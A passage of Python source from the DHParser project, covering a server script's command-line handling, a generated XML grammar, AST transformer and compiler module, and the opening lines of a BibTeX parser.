help="displays the server's status, e.g. whether it is running")
action_group.add_argument('-s', '--startserver', nargs='*', metavar=("HOST", "PORT"),
help="starts the server")
action_group.add_argument('-d', '--startdaemon', action='store_true',
help="starts the server in the background")
action_group.add_argument('-k', '--stopserver', action='store_true',
help="starts the server")
action_group.add_argument('-r', '--stream', action='store_true', help="start stream server")
parser.add_argument('-o', '--host', nargs=1, default=[''],
help='host name or IP-address of the server (default: 127.0.0.1)')
parser.add_argument('-p', '--port', nargs=1, type=int, default=[-1],
help='port number of the server (default:8888)')
parser.add_argument('-l', '--logging', nargs='?', metavar="ON|LOG_DIR|OFF", default='',
help='turns logging on (default) or off or writes log to a '
'specific directory (implies on)')
parser.add_argument('-b', '--debug', action='store_true', help="debug messages")
args = parser.parse_args()
if args.debug:
DEBUG = True
host = args.host[0]
port = int(args.port[0])
if args.stream:
CONNECTION_TYPE = 'streams'
if port >= 0 or host:
echo('Specifying host and port when using streams as transport does not make sense')
sys.exit(1)
log_path, _ = parse_logging_args(args)
run_server('', -1, log_path)
sys.exit(0)
if port < 0 or not host:
# if host and port have not been specified explicitly on the command
# line, try to retrieve them from (temporary) config file or use
# hard coded default values
h, p = retrieve_host_and_port()
debug('Retrieved host and port value %s:%i from config file.' % (h, p))
if port < 0:
port = p
else:
KNOWN_PORT = port # we assume, the user knows what (s)he is doing...
if not host:
host = h
else:
KNOWN_HOST = host # ...when explicitly requesting a particular host, port
if args.status:
result = asyncio_run(single_request(IDENTIFY_REQUEST, host, port, SERVER_REPLY_TIMEOUT))
echo('Server ' + str(result) + ' running on ' + host + ':' + str(port))
elif args.startserver is not None:
portstr = None
if len(args.startserver) == 1:
host, portstr = args.startserver[0].split(':')
elif len(args.startserver) == 2:
host, portstr = args.startserver
elif len(args.startserver) != 0:
parser.error('Wrong number of arguments for "--startserver"!')
if portstr is not None:
try:
port = int(portstr)
except ValueError:
parser.error('port must be a number!')
log_path, _ = parse_logging_args(args)
sys.exit(run_server(host, port, log_path))
elif args.startdaemon:
log_path, log_request = parse_logging_args(args)
asyncio.run(start_server_daemon(host, port, [log_request] if log_request else []))
elif args.stopserver:
try:
result = asyncio_run(single_request(STOP_SERVER_REQUEST_BYTES, host, port))
except ConnectionRefusedError as e:
echo(e)
sys.exit(1)
debug(result)
elif args.logging:
log_path, request = parse_logging_args(args)
debug(asyncio_run(single_request(request, host, port)))
elif args.file:
file_name = args.file
if not file_name.endswith(')'):
# argv does not seem to be a command (e.g. "identify()") but a file name or path
file_name = os.path.abspath(file_name)
log_path, log_request = parse_logging_args(args)
requests = [log_request, file_name] if log_request else [file_name]
result = asyncio_run(start_server_daemon(host, port, requests))[-1]
if len(result) >= DATA_RECEIVE_LIMIT:
echo(result, '...')
else:
echo(result)
else:
echo('Usages:\n'
+ ' python readme_exampleServer.py --startserver [--host host] [--port port] [--logging [ON|LOG_PATH|OFF]]\n'
+ ' python readme_exampleServer.py --startdaemon [--host host] [--port port] [--logging [ON|LOG_PATH|OFF]]\n'
+ ' python readme_exampleServer.py --stream\n'
+ ' python readme_exampleServer.py --stopserver\n'
+ ' python readme_exampleServer.py --status\n'
+ ' python readme_exampleServer.py --logging [ON|LOG_PATH|OFF]\n'
+ ' python readme_exampleServer.py FILENAME.dsl [--host host] [--port port] [--logging [ON|LOG_PATH|OFF]]')
sys.exit(1)
```
#### File: examples/XML/XMLParser.py
```python
import collections
from functools import partial
import os
import sys
try:
scriptpath = os.path.dirname(__file__)
except NameError:
scriptpath = ''
dhparser_parentdir = os.path.abspath(os.path.join(scriptpath, r'../..'))
if scriptpath not in sys.path:
sys.path.append(scriptpath)
if dhparser_parentdir not in sys.path:
sys.path.append(dhparser_parentdir)
try:
import regex as re
except ImportError:
import re
from DHParser import start_logging, suspend_logging, resume_logging, is_filename, load_if_file, \
Grammar, Compiler, nil_preprocessor, PreprocessorToken, Whitespace, Drop, AnyChar, \
Lookbehind, Lookahead, Alternative, Pop, Text, Synonym, Counted, Interleave, INFINITE, \
Option, NegativeLookbehind, OneOrMore, RegExp, Retrieve, Series, Capture, \
ZeroOrMore, Forward, NegativeLookahead, Required, mixin_comment, compile_source, \
grammar_changed, last_value, matching_bracket, PreprocessorFunc, is_empty, remove_if, \
Node, TransformerCallable, TransformationDict, transformation_factory, traverse, \
remove_children_if, move_adjacent, normalize_whitespace, is_anonymous, matches_re, \
reduce_single_child, replace_by_single_child, replace_or_reduce, remove_whitespace, \
replace_by_children, remove_empty, remove_tokens, flatten, PLACEHOLDER, \
merge_adjacent, collapse, collapse_children_if, transform_content, WHITESPACE_PTYPE, \
TOKEN_PTYPE, remove_children, remove_content, remove_brackets, change_tag_name, \
remove_anonymous_tokens, keep_children, is_one_of, not_one_of, has_content, apply_if, peek, \
remove_anonymous_empty, keep_nodes, traverse_locally, strip, lstrip, rstrip, \
transform_content, replace_content_with, forbid, assert_content, remove_infix_operator, \
add_error, error_on, recompile_grammar, left_associative, lean_left, set_config_value, \
get_config_value, node_maker, any_of, access_thread_locals, access_presets, \
finalize_presets, ErrorCode, RX_NEVER_MATCH, set_tracer, resume_notices_on, \
trace_history, has_descendant, neg, has_ancestor, optional_last_value, insert, \
positions_of, replace_tag_names, add_attributes, delimit_children, merge_connected, \
has_attr, has_parent, ThreadLocalSingletonFactory
#######################################################################
#
# PREPROCESSOR SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
def XMLPreprocessor(text, source_name):
return None, text, lambda i: i, []
def get_preprocessor() -> PreprocessorFunc:
return XMLPreprocessor
#######################################################################
#
# PARSER SECTION - Don't edit! CHANGES WILL BE OVERWRITTEN!
#
#######################################################################
class XMLGrammar(Grammar):
r"""Parser for a XML source file.
"""
choice = Forward()
cp = Forward()
element = Forward()
extSubsetDecl = Forward()
ignoreSectContents = Forward()
source_hash__ = "6bca80310e6c9b0436e6568981b9b334"
disposable__ = re.compile('..(?<=^)')
static_analysis_pending__ = [] # type: List[bool]
parser_initialization__ = ["upon instantiation"]
COMMENT__ = r''
comment_rx__ = RX_NEVER_MATCH
WHITESPACE__ = r'\s*'
WSP_RE__ = mixin_comment(whitespace=WHITESPACE__, comment=COMMENT__)
wsp__ = Whitespace(WSP_RE__)
dwsp__ = Drop(Whitespace(WSP_RE__))
EOF = NegativeLookahead(RegExp('.'))
S = RegExp('\\s+')
Char = RegExp('\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]')
Chars = RegExp('(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF])+')
CharRef = Alternative(Series(Drop(Text('&#')), RegExp('[0-9]+'), Drop(Text(';'))), Series(Drop(Text('&#x')), RegExp('[0-9a-fA-F]+'), Drop(Text(';'))))
CommentChars = RegExp('(?:(?!-)(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
PIChars = RegExp('(?:(?!\\?>)(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
IgnoreChars = RegExp('(?:(?!(?:<!\\[)|(?:\\]\\]>))(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
CData = RegExp('(?:(?!\\]\\]>)(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
CharData = RegExp('(?:(?!\\]\\]>)[^<&])+')
PubidChars = RegExp("(?:\\x20|\\x0D|\\x0A|[a-zA-Z0-9]|[-'()+,./:=?;!*#@$_%])+")
PubidCharsSingleQuoted = RegExp('(?:\\x20|\\x0D|\\x0A|[a-zA-Z0-9]|[-()+,./:=?;!*#@$_%])+')
CDSect = Series(Drop(Text('<![CDATA[')), CData, Drop(Text(']]>')))
NameStartChar = RegExp('(?x)_|:|[A-Z]|[a-z]\n |[\\u00C0-\\u00D6]|[\\u00D8-\\u00F6]|[\\u00F8-\\u02FF]\n |[\\u0370-\\u037D]|[\\u037F-\\u1FFF]|[\\u200C-\\u200D]\n |[\\u2070-\\u218F]|[\\u2C00-\\u2FEF]|[\\u3001-\\uD7FF]\n |[\\uF900-\\uFDCF]|[\\uFDF0-\\uFFFD]\n |[\\U00010000-\\U000EFFFF]')
NameChars = RegExp('(?x)(?:_|:|-|\\.|[A-Z]|[a-z]|[0-9]\n |\\u00B7|[\\u0300-\\u036F]|[\\u203F-\\u2040]\n |[\\u00C0-\\u00D6]|[\\u00D8-\\u00F6]|[\\u00F8-\\u02FF]\n |[\\u0370-\\u037D]|[\\u037F-\\u1FFF]|[\\u200C-\\u200D]\n |[\\u2070-\\u218F]|[\\u2C00-\\u2FEF]|[\\u3001-\\uD7FF]\n |[\\uF900-\\uFDCF]|[\\uFDF0-\\uFFFD]\n |[\\U00010000-\\U000EFFFF])+')
Comment = Series(Drop(Text('<!--')), ZeroOrMore(Alternative(CommentChars, RegExp('-(?!-)'))), Drop(Text('-->')))
Name = Series(NameStartChar, Option(NameChars))
PITarget = Series(NegativeLookahead(RegExp('X|xM|mL|l')), Name)
PI = Series(Drop(Text('<?')), PITarget, Option(Series(dwsp__, PIChars)), Drop(Text('?>')))
Misc = OneOrMore(Alternative(Comment, PI, S))
Names = Series(Name, ZeroOrMore(Series(RegExp(' '), Name)))
Nmtoken = Synonym(NameChars)
Nmtokens = Series(Nmtoken, ZeroOrMore(Series(RegExp(' '), Nmtoken)))
PEReference = Series(Drop(Text('%')), Name, Drop(Text(';')))
EntityRef = Series(Drop(Text('&')), Name, Drop(Text(';')))
Reference = Alternative(EntityRef, CharRef)
PubidLiteral = Alternative(Series(Drop(Text('"')), Option(PubidChars), Drop(Text('"'))), Series(Drop(Text("\'")), Option(PubidCharsSingleQuoted), Drop(Text("\'"))))
SystemLiteral = Alternative(Series(Drop(Text('"')), RegExp('[^"]*'), Drop(Text('"'))), Series(Drop(Text("\'")), RegExp("[^']*"), Drop(Text("\'"))))
AttValue = Alternative(Series(Drop(Text('"')), ZeroOrMore(Alternative(RegExp('[^<&"]+'), Reference)), Drop(Text('"'))), Series(Drop(Text("\'")), ZeroOrMore(Alternative(RegExp("[^<&']+"), Reference)), Drop(Text("\'"))))
EntityValue = Alternative(Series(Drop(Text('"')), ZeroOrMore(Alternative(RegExp('[^%&"]+'), PEReference, Reference)), Drop(Text('"'))), Series(Drop(Text("\'")), ZeroOrMore(Alternative(RegExp("[^%&']+"), PEReference, Reference)), Drop(Text("\'"))))
content = Series(Option(CharData), ZeroOrMore(Series(Alternative(element, Reference, CDSect, PI, Comment), Option(CharData))))
Attribute = Series(Name, dwsp__, Drop(Text('=')), dwsp__, AttValue, mandatory=2)
TagName = Capture(Synonym(Name))
emptyElement = Series(Drop(Text('<')), Name, ZeroOrMore(Series(dwsp__, Attribute)), dwsp__, Drop(Text('/>')))
ETag = Series(Drop(Text('</')), Pop(TagName), dwsp__, Drop(Text('>')), mandatory=1)
STag = Series(Drop(Text('<')), TagName, ZeroOrMore(Series(dwsp__, Attribute)), dwsp__, Drop(Text('>')))
EncName = RegExp('[A-Za-z][A-Za-z0-9._\\-]*')
NDataDecl = Series(Drop(Text('NData')), S, Name, mandatory=1)
PublicID = Series(Drop(Text('PUBLIC')), S, PubidLiteral, mandatory=1)
ExternalID = Alternative(Series(Drop(Text('SYSTEM')), S, SystemLiteral, mandatory=1), Series(Drop(Text('PUBLIC')), S, PubidLiteral, S, SystemLiteral, mandatory=1))
NotationDecl = Series(Drop(Text('<!NOTATION')), S, Name, dwsp__, Alternative(ExternalID, PublicID), dwsp__, Drop(Text('>')), mandatory=1)
PEDef = Alternative(EntityValue, ExternalID)
EntityDef = Alternative(EntityValue, Series(ExternalID, Option(NDataDecl)))
PEDecl = Series(Drop(Text('<!ENTITY')), S, Drop(Text('%')), S, Name, S, PEDef, dwsp__, Drop(Text('>')), mandatory=3)
GEDecl = Series(Drop(Text('<!ENTITY')), S, Name, S, EntityDef, dwsp__, Drop(Text('>')), mandatory=3)
EntityDecl = Alternative(GEDecl, PEDecl)
FIXED = Series(Option(Series(Drop(Text('#FIXED')), S)), AttValue)
IMPLIED = Text('#IMPLIED')
REQUIRED = Text('#REQUIRED')
DefaultDecl = Alternative(REQUIRED, IMPLIED, FIXED)
Enumeration = Series(Drop(Text('(')), dwsp__, Nmtoken, ZeroOrMore(Series(dwsp__, Drop(Text('|')), dwsp__, Nmtoken)), dwsp__, Drop(Text(')')))
NotationType = Series(Drop(Text('NOTATION')), S, Drop(Text('(')), dwsp__, Name, ZeroOrMore(Series(dwsp__, Drop(Text('|')), dwsp__, Name)), dwsp__, Drop(Text(')')))
EnumeratedType = Alternative(NotationType, Enumeration)
NMTOKENS = Text('NMTOKENS')
NMTOKEN = Text('NMTOKEN')
ENTITIES = Text('ENTITIES')
ENTITY = Text('ENTITY')
IDREFS = Text('IDREFS')
IDREF = Text('IDREF')
ID = Text('ID')
TokenizedType = Alternative(IDREFS, IDREF, ID, ENTITY, ENTITIES, NMTOKENS, NMTOKEN)
StringType = Text('CDATA')
AttType = Alternative(StringType, TokenizedType, EnumeratedType)
AttDef = Series(Name, dwsp__, AttType, S, DefaultDecl, mandatory=2)
AttlistDecl = Series(Drop(Text('<!ATTLIST')), S, Name, ZeroOrMore(Series(dwsp__, AttDef)), dwsp__, Drop(Text('>')), mandatory=1)
seq = Series(Drop(Text('(')), dwsp__, cp, ZeroOrMore(Series(dwsp__, Drop(Text(',')), dwsp__, cp)), dwsp__, Drop(Text(')')))
VersionNum = RegExp('[0-9]+\\.[0-9]+')
VersionInfo = Series(dwsp__, Drop(Text('version')), dwsp__, Drop(Text('=')), dwsp__, Alternative(Series(Drop(Text("\'")), VersionNum, Drop(Text("\'"))), Series(Drop(Text('"')), VersionNum, Drop(Text('"')))))
children = Series(Alternative(choice, seq), Option(Alternative(Drop(Text('?')), Drop(Text('*')), Drop(Text('+')))))
Mixed = Alternative(Series(Drop(Text('(')), dwsp__, Drop(Text('#PCDATA')), ZeroOrMore(Series(dwsp__, Drop(Text('|')), dwsp__, Name)), dwsp__, Drop(Text(')*'))), Series(Drop(Text('(')), dwsp__, Drop(Text('#PCDATA')), dwsp__, Drop(Text(')'))))
ANY = Text('ANY')
EMPTY = Text('EMPTY')
contentspec = Alternative(EMPTY, ANY, Mixed, children)
elementdecl = Series(Drop(Text('<!ELEMENT')), S, Name, dwsp__, contentspec, dwsp__, Drop(Text('>')), mandatory=1)
EncodingDecl = Series(dwsp__, Drop(Text('encoding')), dwsp__, Drop(Text('=')), dwsp__, Alternative(Series(Drop(Text("\'")), EncName, Drop(Text("\'"))), Series(Drop(Text('"')), EncName, Drop(Text('"')))))
TextDecl = Series(Drop(Text('<?xml')), Option(VersionInfo), EncodingDecl, dwsp__, Drop(Text('?>')))
extParsedEnt = Series(Option(TextDecl), content)
ignoreSect = Series(Drop(Text('<![')), dwsp__, Drop(Text('IGNORE')), dwsp__, Drop(Text('[')), ignoreSectContents, Drop(Text(']]>')))
includeSect = Series(Drop(Text('<![')), dwsp__, Drop(Text('INCLUDE')), dwsp__, Drop(Text('[')), extSubsetDecl, Drop(Text(']]>')))
conditionalSect = Alternative(includeSect, ignoreSect)
Yes = Text('yes')
extSubset = Series(Option(TextDecl), extSubsetDecl)
markupdecl = Alternative(elementdecl, AttlistDecl, EntityDecl, NotationDecl, PI, Comment)
DeclSep = Alternative(PEReference, S)
intSubset = ZeroOrMore(Alternative(markupdecl, DeclSep))
doctypedecl = Series(Drop(Text('<!DOCTYPE')), dwsp__, Name, Option(Series(dwsp__, ExternalID)), dwsp__, Option(Series(Drop(Text('[')), intSubset, Drop(Text(']')), dwsp__)), Drop(Text('>')), mandatory=2)
No = Text('no')
SDDecl = Series(dwsp__, Drop(Text('standalone')), dwsp__, Drop(Text('=')), dwsp__, Alternative(Alternative(Series(Drop(Text("\'")), Yes), Series(No, Drop(Text("\'")))), Alternative(Series(Drop(Text('"')), Yes), Series(No, Drop(Text('"'))))))
XMLDecl = Series(Drop(Text('<?xml')), VersionInfo, Option(EncodingDecl), Option(SDDecl), dwsp__, Drop(Text('?>')))
prolog = Series(Option(Series(dwsp__, XMLDecl)), Option(Misc), Option(Series(doctypedecl, Option(Misc))))
element.set(Alternative(emptyElement, Series(STag, content, ETag, mandatory=1)))
cp.set(Series(Alternative(Name, choice, seq), Option(Alternative(Drop(Text('?')), Drop(Text('*')), Drop(Text('+'))))))
choice.set(Series(Drop(Text('(')), dwsp__, OneOrMore(Series(dwsp__, Drop(Text('|')), dwsp__, cp)), dwsp__, Drop(Text(')'))))
ignoreSectContents.set(Series(IgnoreChars, ZeroOrMore(Series(Drop(Text('<![')), ignoreSectContents, Drop(Text(']]>')), IgnoreChars))))
extSubsetDecl.set(ZeroOrMore(Alternative(markupdecl, conditionalSect, DeclSep)))
document = Series(prolog, element, Option(Misc), EOF)
root__ = document
_raw_grammar = ThreadLocalSingletonFactory(XMLGrammar, ident=1)
def get_grammar() -> XMLGrammar:
grammar = _raw_grammar()
if get_config_value('resume_notices'):
resume_notices_on(grammar)
elif get_config_value('history_tracking'):
set_tracer(grammar, trace_history)
try:
if not grammar.__class__.python_src__:
grammar.__class__.python_src__ = get_grammar.python_src__
except AttributeError:
pass
return grammar
def parse_XML(document, start_parser = "root_parser__", *, complete_match=True):
return get_grammar()(document, start_parser, complete_match)
#######################################################################
#
# AST SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
XML_AST_transformation_table = {
# AST Transformations for the XML-grammar
"<": [flatten, remove_empty, remove_anonymous_tokens, remove_whitespace, remove_children("S")],
"document": [flatten(lambda context: context[-1].tag_name == 'prolog', recursive=False)],
"prolog": [],
"XMLDecl": [],
"VersionInfo": [reduce_single_child],
"VersionNum": [],
"EncodingDecl": [reduce_single_child],
"EncName": [],
"SDDecl": [],
"Yes": [],
"No": [],
"doctypedecl": [],
"intSubset": [],
"DeclSep": [replace_or_reduce],
"markupdecl": [replace_or_reduce],
"extSubset": [],
"extSubsetDecl": [],
"conditionalSect": [replace_or_reduce],
"includeSect": [],
"ignoreSect": [],
"ignoreSectContents": [],
"extParsedEnt": [],
"TextDecl": [],
"elementdecl": [],
"contentspec": [replace_or_reduce],
"EMPTY": [],
"ANY": [],
"Mixed": [replace_or_reduce],
"children": [],
"choice": [],
"cp": [],
"seq": [],
"AttlistDecl": [],
"AttDef": [],
"AttType": [replace_or_reduce],
"StringType": [],
"TokenizedType": [replace_or_reduce],
"ID": [],
"IDREF": [],
"IDREFS": [],
"ENTITY": [],
"ENTITIES": [],
"NMTOKEN": [],
"NMTOKENS": [],
"EnumeratedType": [replace_or_reduce],
"NotationType": [],
"Enumeration": [],
"DefaultDecl": [replace_or_reduce],
"REQUIRED": [],
"IMPLIED": [],
"FIXED": [],
"EntityDecl": [replace_or_reduce],
"GEDecl": [],
"PEDecl": [],
"EntityDef": [replace_or_reduce],
"PEDef": [replace_or_reduce],
"NotationDecl": [],
"ExternalID": [],
"PublicID": [],
"NDataDecl": [],
"element": [flatten, replace_by_single_child],
"STag": [],
"ETag": [reduce_single_child],
"emptyElement": [],
"TagName": [replace_by_single_child],
"Attribute": [],
"content": [flatten],
"EntityValue": [replace_or_reduce],
"AttValue": [replace_or_reduce],
"SystemLiteral": [replace_or_reduce],
"PubidLiteral": [replace_or_reduce],
"Reference": [replace_or_reduce],
"EntityRef": [],
"PEReference": [],
"Nmtokens": [],
"Nmtoken": [reduce_single_child],
"Names": [],
"Name": [collapse],
"NameStartChar": [],
"NameChars": [],
"Misc": [],
"Comment": [collapse],
"PI": [],
"PITarget": [reduce_single_child],
"CDSect": [],
"PubidCharsSingleQuoted": [],
"PubidChars": [],
"CharData": [],
"CData": [],
"IgnoreChars": [],
"PIChars": [],
"CommentChars": [],
"CharRef": [replace_or_reduce],
"Chars": [],
"Char": [],
"S": [],
"EOF": [],
"*": replace_by_single_child
}
def CreateXMLTransformer() -> TransformerCallable:
"""Creates a transformation function that does not share state with other
threads or processes."""
return partial(traverse, processing_table=XML_AST_transformation_table.copy())
def get_transformer() -> TransformerCallable:
"""Returns a thread/process-exclusive transformation function."""
THREAD_LOCALS = access_thread_locals()
try:
transformer = THREAD_LOCALS.XML_00000001_transformer_singleton
except AttributeError:
THREAD_LOCALS.XML_00000001_transformer_singleton = CreateXMLTransformer()
transformer = THREAD_LOCALS.XML_00000001_transformer_singleton
return transformer
#######################################################################
#
# COMPILER SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
# def internalize(context):
# """Sets the node's parser type to the tag name and internalizes
# XML attr."""
# node = context[-1]
# if node.parser.name == 'element':
# node.parser = MockParser(node['STag']['Name'].content, ':element')
# node.result = node.result[1:-1]
# elif node.parser.name == 'emptyElement':
# node.parser = MockParser(node['Name'].content, ':emptyElement')
# node.result = node.result[1:]
# else:
# assert node.parser.ptype in [':element', ':emptyElement'], \
# "Tried to internalize tag name and attr for non element component!"
# return
# for nd in node.result:
# if nd.parser.name == 'Attribute':
# node.attr[nd['Name'].content] = nd['AttValue'].content
# remove_children(context, {'Attribute'})
class XMLCompiler(Compiler):
"""Compiler for the abstract-syntax-tree of a XML source file.
"""
def __init__(self):
super(XMLCompiler, self).__init__()
self.cleanup_whitespace = True # remove empty CharData from mixed elements
def reset(self):
super().reset()
self.mock_parsers = dict()
def extract_attributes(self, node_sequence):
attributes = collections.OrderedDict()
for node in node_sequence:
if node.tag_name == "Attribute":
assert node[0].tag_name == "Name", node.as_sexpr()
assert node[1].tag_name == "AttValue", node.as_sxpr()
attributes[node[0].content] = node[1].content
return attributes
def get_parser(self, tag_name):
"""Returns a mock parser with the given tag_name as parser name."""
return self.mock_parsers.setdefault(tag_name, MockParser(tag_name))
def validity_constraint(self, node, condition, err_msg):
"""If `condition` is False an error is issued."""
if not condition:
self.tree.add_error(node, err_msg)
def value_constraint(self, node, value, allowed):
"""If value is not in allowed, an error is issued."""
self.constraint(node, value in allowed,
'Invalid value "%s" for "standalone"! Must be one of %s.' % (value, str(allowed)))
def on_document(self, node):
self.tree.string_tags.update({'CharData', 'document'})
# TODO: Remove the following line. It is specific for testing with example.xml!
self.tree.inline_tags.update({'to', 'from', 'heading', 'body', 'remark'})
return self.fallback_compiler(node)
# def on_prolog(self, node):
# return node
def on_XMLDecl(self, node):
attributes = dict()
for child in node.children:
s = child.content
if child.tag_name == "VersionInfo":
attributes['version'] = s
elif child.tag_name == "EncodingDecl":
attributes['encoding'] = s
elif child.tag_name == "SDDecl":
attributes['standalone'] = s
self.value_constraint(node, s, {'yes', 'no'})
if attributes:
node.attr.update(attributes)
node.result = ''
self.tree.empty_tags.add('?xml')
node.tag_name = '?xml' # node.parser = self.get_parser('?xml')
return node
# def on_VersionInfo(self, node):
# return node
# def on_VersionNum(self, node):
# return node
# def on_EncodingDecl(self, node):
# return node
# def on_EncName(self, node):
# return node
# def on_SDDecl(self, node):
# return node
# def on_Yes(self, node):
# return node
# def on_No(self, node):
# return node
# def on_doctypedecl(self, node):
# return node
# def on_intSubset(self, node):
# return node
# def on_DeclSep(self, node):
# return node
# def on_markupdecl(self, node):
# return node
# def on_extSubset(self, node):
# return node
# def on_extSubsetDecl(self, node):
# return node
# def on_conditionalSect(self, node):
# return node
# def on_includeSect(self, node):
# return node
# def on_ignoreSect(self, node):
# return node
# def on_ignoreSectContents(self, node):
# return node
# def on_extParsedEnt(self, node):
# return node
# def on_TextDecl(self, node):
# return node
# def on_elementdecl(self, node):
# return node
# def on_contentspec(self, node):
# return node
# def on_EMPTY(self, node):
# return node
# def on_ANY(self, node):
# return node
# def on_Mixed(self, node):
# return node
# def on_children(self, node):
# return node
# def on_choice(self, node):
# return node
# def on_cp(self, node):
# return node
# def on_seq(self, node):
# return node
# def on_AttlistDecl(self, node):
# return node
# def on_AttDef(self, node):
# return node
# def on_AttType(self, node):
# return node
# def on_StringType(self, node):
# return node
# def on_TokenizedType(self, node):
# return node
# def on_ID(self, node):
# return node
# def on_IDREF(self, node):
# return node
# def on_IDREFS(self, node):
# return node
# def on_ENTITY(self, node):
# return node
# def on_ENTITIES(self, node):
# return node
# def on_NMTOKEN(self, node):
# return node
# def on_NMTOKENS(self, node):
# return node
# def on_EnumeratedType(self, node):
# return node
# def on_NotationType(self, node):
# return node
# def on_Enumeration(self, node):
# return node
# def on_DefaultDecl(self, node):
# return node
# def on_REQUIRED(self, node):
# return node
# def on_IMPLIED(self, node):
# return node
# def on_FIXED(self, node):
# return node
# def on_EntityDecl(self, node):
# return node
# def on_GEDecl(self, node):
# return node
# def on_PEDecl(self, node):
# return node
# def on_EntityDef(self, node):
# return node
# def on_PEDef(self, node):
# return node
# def on_NotationDecl(self, node):
# return node
# def on_ExternalID(self, node):
# return node
# def on_PublicID(self, node):
# return node
# def on_NDataDecl(self, node):
# return node
def on_element(self, node):
stag = node['STag']
tag_name = stag['Name'].content
attributes = self.extract_attributes(stag.children)
preserve_whitespace = tag_name in self.tree.inline_tags
if attributes:
node.attr.update(attributes)
preserve_whitespace |= attributes.get('xml:space', '') == 'preserve'
node.tag_name = tag_name
content = tuple(self.compile(nd) for nd in node.get('content', PLACEHOLDER).children)
if len(content) == 1:
if content[0].tag_name == "CharData":
# reduce single CharData children
content = content[0].content
elif self.cleanup_whitespace and not preserve_whitespace:
# remove CharData that consists only of whitespace from mixed elements
content = tuple(child for child in content
if child.tag_name != "CharData" or child.content.strip() != '')
node.result = content
return node
# def on_STag(self, node):
# return node
# def on_ETag(self, node):
# return node
def on_emptyElement(self, node):
attributes = self.extract_attributes(node.children)
if attributes:
node.attr.update(attributes)
node.tag_name = node['Name'].content # node.parser = self.get_parser(node['Name'].content)
node.result = ''
self.tree.empty_tags.add(node.tag_name)
return node
# def on_TagName(self, node):
# return node
# def on_Attribute(self, node):
# return node
# def on_content(self, node):
# return node
# def on_EntityValue(self, node):
# return node
# def on_AttValue(self, node):
# return node
# def on_SystemLiteral(self, node):
# return node
# def on_PubidLiteral(self, node):
# return node
# def on_Reference(self, node):
# return node
# def on_EntityRef(self, node):
# return node
# def on_PEReference(self, node):
# return node
# def on_Nmtokens(self, node):
# return node
# def on_Nmtoken(self, node):
# return node
# def on_Names(self, node):
# return node
# def on_Name(self, node):
# return node
# def on_NameStartChar(self, node):
# return node
# def on_NameChars(self, node):
# return node
# def on_Misc(self, node):
# return node
# def on_Comment(self, node):
# return node
# def on_PI(self, node):
# return node
# def on_PITarget(self, node):
# return node
# def on_CDSect(self, node):
# return node
# def on_PubidCharsSingleQuoted(self, node):
# return node
# def on_PubidChars(self, node):
# return node
# def on_CharData(self, node):
# return node
# def on_CData(self, node):
# return node
# def on_IgnoreChars(self, node):
# return node
# def on_PIChars(self, node):
# return node
# def on_CommentChars(self, node):
# return node
# def on_CharRef(self, node):
# return node
# def on_Chars(self, node):
# return node
# def on_Char(self, node):
# return node
# def on_S(self, node):
# return node
# def on_EOF(self, node):
# return node
def get_compiler() -> XMLCompiler:
"""Returns a thread/process-exclusive XMLCompiler-singleton."""
THREAD_LOCALS = access_thread_locals()
try:
compiler = THREAD_LOCALS.XML_00000001_compiler_singleton
except AttributeError:
THREAD_LOCALS.XML_00000001_compiler_singleton = XMLCompiler()
compiler = THREAD_LOCALS.XML_00000001_compiler_singleton
return compiler
#######################################################################
#
# END OF DHPARSER-SECTIONS
#
#######################################################################
def compile_src(source):
"""Compiles ``source`` and returns (result, errors, ast).
"""
result_tuple = compile_source(source, get_preprocessor(), get_grammar(), get_transformer(),
get_compiler())
return result_tuple
if __name__ == "__main__":
# recompile grammar if needed
if __file__.endswith('Parser.py'):
grammar_path = os.path.abspath(__file__).replace('Parser.py', '.ebnf')
else:
grammar_path = os.path.splitext(__file__)[0] + '.ebnf'
parser_update = False
def notify():
global parser_update
parser_update = True
print('recompiling ' + grammar_path)
if os.path.exists(grammar_path) and os.path.isfile(grammar_path):
if not recompile_grammar(grammar_path, force=False, notify=notify):
error_file = os.path.basename(__file__).replace('Parser.py', '_ebnf_ERRORS.txt')
with open(error_file, encoding="utf-8") as f:
print(f.read())
sys.exit(1)
elif parser_update:
print(os.path.basename(__file__) + ' has changed. '
'Please run again in order to apply updated compiler')
sys.exit(0)
else:
print('Could not check whether grammar requires recompiling, '
'because grammar was not found at: ' + grammar_path)
from argparse import ArgumentParser
parser = ArgumentParser(description="Parses a XML-file and shows its syntax-tree.")
parser.add_argument('files', nargs=1)
parser.add_argument('-d', '--debug', action='store_const', const='debug')
parser.add_argument('-x', '--xml', action='store_const', const='xml')
args = parser.parse_args()
file_name, log_dir = args.files[0], ''
if not os.path.exists(file_name):
print('File "%s" not found!' % file_name)
sys.exit(1)
if not os.path.isfile(file_name):
print('"%" is not a file!' % file_name)
sys.exit(1)
if args.debug is not None:
log_dir = 'LOGS'
set_config_value('history_tracking', True)
set_config_value('resume_notices', True)
set_config_value('log_syntax_trees', set(('cst', 'ast')))
start_logging(log_dir)
result, errors, _ = compile_src(file_name)
if errors:
cwd = os.getcwd()
rel_path = file_name[len(cwd):] if file_name.startswith(cwd) else file_name
for error in errors:
print(rel_path + ':' + str(error))
sys.exit(1)
else:
print(result.serialize(how='default' if args.xml is None else 'xml')
if isinstance(result, Node) else result)
```
#### File: experimental/BibTeX/BibTeXParser.py
```python
from functools import partial
import os
import sys
try:
import regex as re
except ImportError:
import re
dhparser_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../examples', '..'))
if dhparser_path not in sys.path:
sys.path.append(dhparser_path)
from DHParser import is_filename, load_if_file, get_config_value, \
Grammar, Compiler, nil_preprocessor, access_thread_locals, \
